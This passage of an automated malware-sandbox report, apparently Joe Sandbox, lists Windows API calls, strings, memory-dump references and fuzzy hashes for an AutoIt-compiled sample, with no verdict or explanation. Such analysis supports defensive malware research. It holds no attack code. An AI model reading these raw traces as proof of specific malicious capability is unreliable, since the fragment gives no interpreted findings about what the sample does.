                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007C7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007C777B
                    • SelectObject.GDI32(00000006,?), ref: 007C7783
                    • DeleteObject.GDI32(?), ref: 007C778C
                    • DeleteDC.GDI32(00000006), ref: 007C7793
                    • ReleaseDC.USER32(00000000,?), ref: 007C779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: ebfcb87e7b7236a64e76b28ccffd2dbcc04a63cbe33bd36894d2962f69e8beb5
                    • Instruction ID: b3614256bf291b747c1f0184ff52214dd706cae0265d9baa997120161b5836fc
                    • Opcode Fuzzy Hash: ebfcb87e7b7236a64e76b28ccffd2dbcc04a63cbe33bd36894d2962f69e8beb5
                    • Instruction Fuzzy Hash: 98511975904209EFCB15CFA8CC85EAEBBB9EF48710F14C52EE95AA7210D635A940CB64
                    APIs
                      • Part of subcall function 00770B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00756C6C,?,00008000), ref: 00770BB7
                      • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00756E5A
                      • Part of subcall function 007559CD: _wcscpy.LIBCMT ref: 00755A05
                      • Part of subcall function 0077387D: _iswctype.LIBCMT ref: 00773885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 20f645cbabf8af55791e94dd08496ef1009c5891c3a8ea256487184b48dec642
                    • Instruction ID: 9239c05e2fe13333701ce700d7bd836d7ba83b836f74fc69fda7e89d5f3c1059
                    • Opcode Fuzzy Hash: 20f645cbabf8af55791e94dd08496ef1009c5891c3a8ea256487184b48dec642
                    • Instruction Fuzzy Hash: BA02CD71108340DFC724EF24C895AAFBBE5BF88354F44491DF88A932A1DB78E949CB52
                    APIs
                    • _memset.LIBCMT ref: 007545F9
                    • GetMenuItemCount.USER32(00816890), ref: 0078D7CD
                    • GetMenuItemCount.USER32(00816890), ref: 0078D87D
                    • GetCursorPos.USER32(?), ref: 0078D8C1
                    • SetForegroundWindow.USER32(00000000), ref: 0078D8CA
                    • TrackPopupMenuEx.USER32(00816890,00000000,?,00000000,00000000,00000000), ref: 0078D8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0078D8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                    • Instruction ID: 7cd754ed6b35dc6b4844eeb7e91eb3d36f1e19f66a0671aa032bad9f8317c987
                    • Opcode Fuzzy Hash: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                    • Instruction Fuzzy Hash: C4714630681205BEEB309F24DC49FEABF65FF04368F244216F925A61E1C7B96C60DB94
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007C8BEC
                    • CoInitialize.OLE32(00000000), ref: 007C8C19
                    • CoUninitialize.OLE32 ref: 007C8C23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 007C8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 007C8E50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007E2C0C), ref: 007C8E84
                    • CoGetObject.OLE32(?,00000000,007E2C0C,?), ref: 007C8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 007C8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007C8F3A
                    • VariantClear.OLEAUT32(?), ref: 007C8F4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,~
                    • API String ID: 2395222682-1083855107
                    • Opcode ID: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                    • Instruction ID: 01d299d548d6c5a4786b559b14785818bc7fd9747a79c466d26a0dd40b9e559d
                    • Opcode Fuzzy Hash: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                    • Instruction Fuzzy Hash: D1C134B1608305EFC740DF24C884E6AB7E9BF89348F00496DF98A9B251DB75ED05CB62
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 3afa9060557cc30c4c7b7bfbd4761024ab6e33591f3fefd496ecd3f119148bb3
                    • Instruction ID: 4e436fa7cc51ca61a602a2a7f15de7bfb0c52615e7e7477464fdb72afd33622d
                    • Opcode Fuzzy Hash: 3afa9060557cc30c4c7b7bfbd4761024ab6e33591f3fefd496ecd3f119148bb3
                    • Instruction Fuzzy Hash: 9F414D3025024EDBCF20EFA0DC95AEA3734FF15340F908455FD959B292DB79A95ACBA0
                    APIs
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                      • Part of subcall function 00757A84: _memmove.LIBCMT ref: 00757B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                    • Instruction ID: 8eaf4428a8d9c1057cce06ac70a7ef8da00c0f33fa8da1670df14a3c9ac2a75f
                    • Opcode Fuzzy Hash: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                    • Instruction Fuzzy Hash: A5118220A50269B9E728A675DC4AEFFBB7CFF95F01F400469B811E21D1EEA81D09C5A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: f0d5c080b2c24940e20a82065e859e3265929ec9367fda014f908c2a567b7d42
                    • Instruction ID: e90cff8d363b4489c2c07fd58f9fc008c22421eb22405aa41a0046911c78a3bf
                    • Opcode Fuzzy Hash: f0d5c080b2c24940e20a82065e859e3265929ec9367fda014f908c2a567b7d42
                    • Instruction Fuzzy Hash: 2911D232904115EBCB24AB249C0AFDB77BCDB01760F0481B6F44996192EF7CAA819B61
                    APIs
                    • timeGetTime.WINMM ref: 007B521C
                      • Part of subcall function 00770719: timeGetTime.WINMM(?,7694B400,00760FF9), ref: 0077071D
                    • Sleep.KERNEL32(0000000A), ref: 007B5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 007B526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007B528E
                    • SetActiveWindow.USER32 ref: 007B52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B52DA
                    • Sleep.KERNEL32(000000FA), ref: 007B52E5
                    • IsWindow.USER32 ref: 007B52F1
                    • EndDialog.USER32(00000000), ref: 007B5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                    • Instruction ID: 1f5e5612de6bc84f238b005ecc58d5b8f02c67d21c798e9073809516c1763d75
                    • Opcode Fuzzy Hash: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                    • Instruction Fuzzy Hash: DD216FB0206704EFE7015B60ED89BE63B7EFB54386F089429F102822B1DB799D508B66
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • CoInitialize.OLE32(00000000), ref: 007BD855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007BD8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 007BD8FC
                    • CoCreateInstance.OLE32(007E2D7C,00000000,00000001,0080A89C,?), ref: 007BD948
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007BD9B7
                    • CoTaskMemFree.OLE32(?,?), ref: 007BDA0F
                    • _memset.LIBCMT ref: 007BDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 007BDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007BDAAB
                    • CoTaskMemFree.OLE32(00000000), ref: 007BDAB2
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007BDAE9
                    • CoUninitialize.OLE32(00000001,00000000), ref: 007BDAEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: d5694dd5802f3e8db4024f642bb38a0c861f598dd2e20e25472451f97aa33725
                    • Instruction ID: e0d6fd526cb851e5b97d9a2af5a7f453b51f798015fa69b4b40f37dd22f411b1
                    • Opcode Fuzzy Hash: d5694dd5802f3e8db4024f642bb38a0c861f598dd2e20e25472451f97aa33725
                    • Instruction Fuzzy Hash: ACB10A75A00108EFDB14DFA4C888EAEBBB9FF48315B148469F90AEB251DB74ED45CB50
                    APIs
                    • GetKeyboardState.USER32(?), ref: 007B05A7
                    • SetKeyboardState.USER32(?), ref: 007B0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 007B0632
                    • GetKeyState.USER32(000000A0), ref: 007B0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 007B0678
                    • GetKeyState.USER32(000000A1), ref: 007B0689
                    • GetAsyncKeyState.USER32(00000011), ref: 007B06B5
                    • GetKeyState.USER32(00000011), ref: 007B06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 007B06EC
                    • GetKeyState.USER32(00000012), ref: 007B06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 007B0723
                    • GetKeyState.USER32(0000005B), ref: 007B0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                    • Instruction ID: ec384e3dae67a16c38cbc7f1793013f2f86f244beb04860638577318896dad61
                    • Opcode Fuzzy Hash: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                    • Instruction Fuzzy Hash: AD51EB20A0478859FF35DBB08455BEBBFB49F01380F48859AD5C2565C2DA6CAB4CCBE1
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 007AC746
                    • GetWindowRect.USER32(00000000,?), ref: 007AC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 007AC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 007AC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AC827
                    • GetDlgItem.USER32(?,000003E9), ref: 007AC835
                    • GetWindowRect.USER32(00000000,?), ref: 007AC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AC889
                    • GetDlgItem.USER32(?,000003EA), ref: 007AC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007AC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                    • Instruction ID: 3e5ea42c84cb4925b0de5092a1cf15d1344de85a4d52c0a863d6db2c66404f13
                    • Opcode Fuzzy Hash: c6ea2152c5bf891d271d06e21493100c7919cab4037a7ed07a1b360aba025939
                    • Instruction Fuzzy Hash: A2514F71B00205BBDB18CF68DD89AAEBBB6FB89311F14822DF516D6290D7749D008B14
                    APIs
                      • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007520D3
                    • KillTimer.USER32(-00000001,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0075216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 0078BEF6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF27
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF3E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007516CB,00000000,?,?,00751AE2,?,?), ref: 0078BF5A
                    • DeleteObject.GDI32(00000000), ref: 0078BF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                    • Instruction ID: 88023b7e3369f7b0aabd978791bccdbc300463d1838439231ea6b1f55058618f
                    • Opcode Fuzzy Hash: 04fd360b41536614768490aa1f2693f658088d4cad92c39ff75bc738863e6bad
                    • Instruction Fuzzy Hash: 1F619E31102610DFCB35AF14DD48BAAB7F1FF41312F108529E986879A1D7BDA896DF50
                    APIs
                      • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                    • GetSysColor.USER32(0000000F), ref: 007521D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
                    • Instruction ID: acdbe4cb752a358f373f4b4e0d497cf7cfb471f672f6dbdf994e5e4485c7ef69
                    • Opcode Fuzzy Hash: fe19aa1bdfb4b378e637f70cd274cbb165f374df3481cb17b2694194e4a7a1f0
                    • Instruction Fuzzy Hash: 6641B1351011449BDB215F28EC88BF93B65FB07332F198266FD668A1E2C77A8C47DB61
                    APIs
                    • CharLowerBuffW.USER32(?,?,007DF910), ref: 007BAB76
                    • GetDriveTypeW.KERNEL32(00000061,0080A620,00000061), ref: 007BAC40
                    • _wcscpy.LIBCMT ref: 007BAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
                    • Instruction ID: cec151861a0ba080fb8cd52260b8e1b1be3d14175529f5b9dd6243582b70ddae
                    • Opcode Fuzzy Hash: 3cdcc5eaf8c8d2437a65f9ec2c8ac1fc97739cc390c19b257251e8d7a075078d
                    • Instruction Fuzzy Hash: 6D519D70208301EBC724EF54C895AEBB7A5FF84301F148829F996972E2DB79D949CA53
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 6d8d6136eaa8485cbd4c8680aef600a80b64e3705c67027444286504173ea5ad
                    • Instruction ID: c87137aafa47d02b058b69334f42613ad2e7bf0165c465b4f9537a3f8f9cbe1f
                    • Opcode Fuzzy Hash: 6d8d6136eaa8485cbd4c8680aef600a80b64e3705c67027444286504173ea5ad
                    • Instruction Fuzzy Hash: 5C410671614205EFDF24EF38DC46FBA73E8EB44300F20846EEA49D7281EA79A945CB11
                    APIs
                    • _memset.LIBCMT ref: 007D73D9
                    • CreateMenu.USER32 ref: 007D73F4
                    • SetMenu.USER32(?,00000000), ref: 007D7403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7490
                    • IsMenu.USER32(?), ref: 007D74A6
                    • CreatePopupMenu.USER32 ref: 007D74B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D74DD
                    • DrawMenuBar.USER32 ref: 007D74E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
